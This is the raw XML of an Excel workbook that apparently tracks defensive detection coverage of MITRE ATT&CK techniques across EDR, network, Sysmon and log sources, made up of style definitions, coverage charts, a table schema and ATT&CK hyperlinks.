    <xf numFmtId="1" fontId="0" fillId="7" borderId="0" xfId="0" applyNumberFormat="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="12" borderId="70" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="71" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="72" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="11" borderId="54" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="11" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="68" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="69" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="66" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="6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49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="10" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="11" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="51" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="44" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="43" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="45" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="55" xfId="0" applyFont="1"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0" fillId="0" borderId="23" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="73" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="23" xfId="0" applyFill="1" applyBorder="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left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="3" borderId="29" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="3" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="13" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="14" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="15" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment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4" fillId="3" borderId="3" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="4" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="5" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="30" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="3" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="17" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="18" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="3" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="54" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="42" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="42" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="42" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="42" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="54" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="54" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="54" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="54" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="54" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="42" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="42" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="27" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="38" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="42" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="42" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="42" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="42" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="38" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="61"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63" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="42" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="2">
    <cellStyle name="Hyperlink" xfId="1" builtinId="8"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="67">
    <dxf>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outline="0">
        <left style="thin">
          <color indexed="64"/>
        </left>
      </border>
    </dxf>
    <dxf>
      <numFmt numFmtId="1" formatCode="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medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color theme="1"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>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
      <fill>
        <patternFill>
          <bgColor theme="1"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFC000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FF00B0F0"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="0" tint="-0.24994659260841701"/>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Confidence of Coverage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rgbClr val="92D050"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
            <a:sp3d/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:dPt>
            <c:idx val="1"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:sp3d/>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="2"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:sp3d/>
            </c:spPr>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>Graphs!$Q$3:$S$3</c:f>
              <c:strCache>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>High</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Med</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Low</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Graphs!$Q$4:$S$4</c:f>
              <c:numCache>
                <c:formatCode>0</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:shape val="box"/>
        <c:axId val="429181856"/>
        <c:axId val="429170432"/>
        <c:axId val="0"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="429181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0432"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="42917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8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Counts out of 187 Techniques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Graphs!$C$3</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Counts</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:dPt>
            <c:idx val="3"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="4"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="tx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Graphs!$A$4:$A$8</c:f>
              <c:strCache>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>EDR</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Network</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Sysmon - Dll</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>LOG-MD
(non-log)</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>
Logs</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Graphs!$C$4:$C$8</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82"/>
        <c:axId val="429170976"/>
        <c:axId val="610997328"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="42917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97328"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="610997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 of Coverage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Graphs!$B$3</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Percent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Graphs!$A$4:$A$8</c:f>
              <c:strCache>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>EDR</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Network</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Sysmon - Dll</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>LOG-MD
(non-log)</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>
Logs</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Graphs!$B$4:$B$8</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="ctr"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:overlap val="100"/>
        <c:axId val="610989712"/>
        <c:axId val="610991344"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="610989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Detection TECH</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991344"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="610991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a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US"/>
                  <a:t>Percentage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98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Stats!$D$5:$D$25</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="21"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Stats!$E$5:$E$25</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="21"/>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="610991888"/>
        <c:axId val="610985904"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="61099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85904"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="61098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9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13</xdr:col>
      <xdr:colOff>529590</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>171450</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>21</xdr:col>
      <xdr:colOff>224790</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426720</xdr:colOff>
      <xdr:row>17</xdr:row>
      <xdr:rowOff>3810</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>11</xdr:col>
      <xdr:colOff>300990</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655320</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>26670</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>11</xdr:col>
      <xdr:colOff>228600</xdr:colOff>
      <xdr:row>16</xdr:row>
      <xdr:rowOff>26670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0</xdr:row>
      <xdr:rowOff>217170</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>16</xdr:col>
      <xdr:colOff>68580</xdr:colOff>
      <xdr:row>14</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580114</xdr:colOff>
      <xdr:row>26</xdr:row>
      <xdr:rowOff>142286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82880"/>
          <a:ext cx="7285714" cy="47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1</xdr:row>
      <xdr:rowOff>45720</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>17</xdr:col>
      <xdr:colOff>349258</xdr:colOff>
      <xdr:row>31</xdr:row>
      <xdr:rowOff>6939</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2" name="Picture 1"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="617220" y="228600"/>
          <a:ext cx="10095238" cy="54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16</xdr:col>
      <xdr:colOff>551314</xdr:colOff>
      <xdr:row>28</xdr:row>
      <xdr:rowOff>85095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381000"/>
          <a:ext cx="9085714" cy="5038095"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="1" name="Table1" displayName="Table1" ref="B3:Z190" totalsRowShown="0" headerRowDxfId="25" headerRowBorderDxfId="24">
  <autoFilter ref="B3:Z190"/>
  <sortState ref="B2:W188">
    <sortCondition ref="B1:B188"/>
  </sortState>
  <tableColumns count="25">
    <tableColumn id="1" name="Tactic" dataDxfId="23"/>
    <tableColumn id="2" name="TechniqueName" dataDxfId="22"/>
    <tableColumn id="3" name="TechniqueID" dataDxfId="21"/>
    <tableColumn id="4" name="Data Source 1" dataDxfId="11"/>
    <tableColumn id="5" name="Data Source 2" dataDxfId="10"/>
    <tableColumn id="6" name="Data Source 3" dataDxfId="9"/>
    <tableColumn id="7" name="Data Source 4" dataDxfId="8"/>
    <tableColumn id="8" name="Data Source 5" dataDxfId="7"/>
    <tableColumn id="9" name="Data Source 6" dataDxfId="6"/>
    <tableColumn id="10" name="Data Source 7" dataDxfId="5"/>
    <tableColumn id="11" name="Data Source 8" dataDxfId="4"/>
    <tableColumn id="12" name="Data Source 9" dataDxfId="3"/>
    <tableColumn id="13" name="Data Source 10" dataDxfId="2"/>
    <tableColumn id="14" name="Data Source 11" dataDxfId="1"/>
    <tableColumn id="15" name="Data Source 12" dataDxfId="0"/>
    <tableColumn id="16" name="EDR" dataDxfId="19"/>
    <tableColumn id="17" name="Packet" dataDxfId="18"/>
    <tableColumn id="18" name="LMD" dataDxfId="17"/>
    <tableColumn id="23" name="Sysmon" dataDxfId="16"/>
    <tableColumn id="24" name="Logs" dataDxfId="15"/>
    <tableColumn id="25" name="Rating" dataDxfId="14"/>
    <tableColumn id="19" name="Query Summary" dataDxfId="12"/>
    <tableColumn id="20" name="Analytic Details" dataDxfId="13"/>
    <tableColumn id="21" name="URL"/>
    <tableColumn id="22" name="Mitigation"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ttack.mitre.org/wiki/T1051"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17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Collection" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1219" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1017" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1043" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1053" TargetMode="External"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1032" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1083" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1069" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1119" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1173" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1134" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1179" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1065" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1186" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1217" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Exfiltration" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1051" TargetMode="External"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1072" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Credential_Access" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1211" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1102" TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1050" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1030" TargetMode="External"/><Relationship Id="rId315" 